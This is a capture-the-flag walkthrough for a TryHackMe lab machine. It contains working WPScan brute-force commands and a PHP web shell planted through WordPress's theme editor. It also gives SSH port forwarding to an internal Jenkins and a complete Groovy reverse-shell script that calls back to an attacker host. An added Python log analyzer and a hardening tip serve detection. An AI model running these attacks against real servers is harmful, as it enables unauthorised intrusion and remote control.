Internal
https://tryhackme.com/room/internal
First of all, make sure your hosts file has an entry for internal.thm.
User flag
Start the nmap scan

There are two open ports (22, 80). Heading to port 80 we see the default Apache page.

Let's fire up gobuster and see if there's anything else on that domain.

We see there's a WordPress blog.

Let's use WPScan to get info about the blog and its users.
wpscan --url internal.thm/blog/ --enumerate u


Let's try to crack the user's password.
wpscan --url http://internal.thm/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin


We found a password. Let's log in to the admin panel.

We're in.

If we take a look at one of the posts we find these credentials:

We tried to SSH in and to log in to the phpMyAdmin page with these credentials, with no success. So let's try to get a reverse shell by replacing a theme template file with a PHP shell.
Appearance > Theme editor (then choose the file you want to modify; we'll edit the 404.php file)

Start a nc listener and get the shell.
If you modified the 404.php file, you just have to request a path that doesn't exist within the WordPress blog. For example: http://internal.thm/blog/index.php/2020/08/03/doesntexist/
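A defender's view of the steps above, as an added example that is not part of the original walkthrough: it scans Apache combined-format access logs for repeated login POSTs, a successful login that follows them, and use of the theme file editor. The log lines, IP addresses, threshold and theme name are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" format: client IP, request method, URL and status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
AUTH_PATHS = ("/wp-login.php", "/xmlrpc.php")  # endpoints that accept password guesses
EDITOR_PATH = "/wp-admin/theme-editor.php"     # built-in theme file editor

def analyze(lines, threshold=5):
    """Return {ip: [findings]} for login guessing and theme-editor use."""
    posts = Counter()
    findings = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in combined format
        ip, method, url, status = m.groups()
        path, _, query = url.partition("?")
        if method == "POST" and path.endswith(AUTH_PATHS):
            posts[ip] += 1
            if posts[ip] == threshold:
                findings[ip].append("password-guessing")
            # wp-login.php answers a failed login with 200 and a successful one with 302
            if status == "302" and posts[ip] > threshold and path.endswith("/wp-login.php"):
                findings[ip].append("login-success-after-guessing")
        elif path.endswith(EDITOR_PATH) and "file=" in query:
            findings[ip].append("theme-editor:" + query)
    return dict(findings)

def sample_log():
    """Constructed lines: six failed logins, one success, then the theme editor."""
    fmt = '{ip} - - [03/Aug/2020:10:00:{s:02d} +0000] "{req} HTTP/1.1" {st} 512 "-" "-"'
    lines = [fmt.format(ip="10.9.0.5", s=i, req="POST /blog/wp-login.php", st=200) for i in range(6)]
    lines.append(fmt.format(ip="10.9.0.5", s=20, req="POST /blog/wp-login.php", st=302))
    lines.append(fmt.format(ip="10.9.0.5", s=30, req="GET /blog/wp-admin/theme-editor.php?file=404.php&theme=example", st=200))
    lines.append(fmt.format(ip="10.9.0.7", s=31, req="POST /blog/wp-login.php", st=302))  # ordinary login
    return lines

if __name__ == "__main__":
    for ip, hits in analyze(sample_log()).items():
        print(ip, hits)
```

Setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the theme editor used in this step, so an admin password alone no longer allows template files to be changed from the dashboard.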

As usual, let's upgrade the shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
Taking a look around we find credentials for phpMyAdmin.

We logged in and didn't find anything interesting, so we keep on enumerating.
We find something interesting in the /opt/ folder.

Let's use those credentials to ssh into the machine and get the user flag.

Root flag
Reading the content of jenkins.txt we can see there's a Jenkins service running on 172.17.0.2:8080

Let's do a lil ol' port forwarding via SSH (we used port 8001 instead of 8080 because we're gonna be using 8080 for Burp Suite)
ssh -L 8001:172.17.0.2:8080 aubreanna@internal.thm
Now we can try to log in to the Jenkins service.

We can try to log in using every credential we found earlier, but none of them will work. So let's use Burp Suite's Turbo Intruder to crack it.
We'll take a wild guess and assume the user is "admin".


After a few seconds we get the password.

Now we can log in to the Jenkins service and get a reverse shell from there using this method:
Manage Jenkins > Script Console
String host="YOUR_IP";
int port=9001;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();po.flush();
Thread.sleep(50);
try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();

Start a nc listener and get da shell.

After a little bit of enumeration we find the credentials for the root user.

Let's SSH in as root and get the root flag.
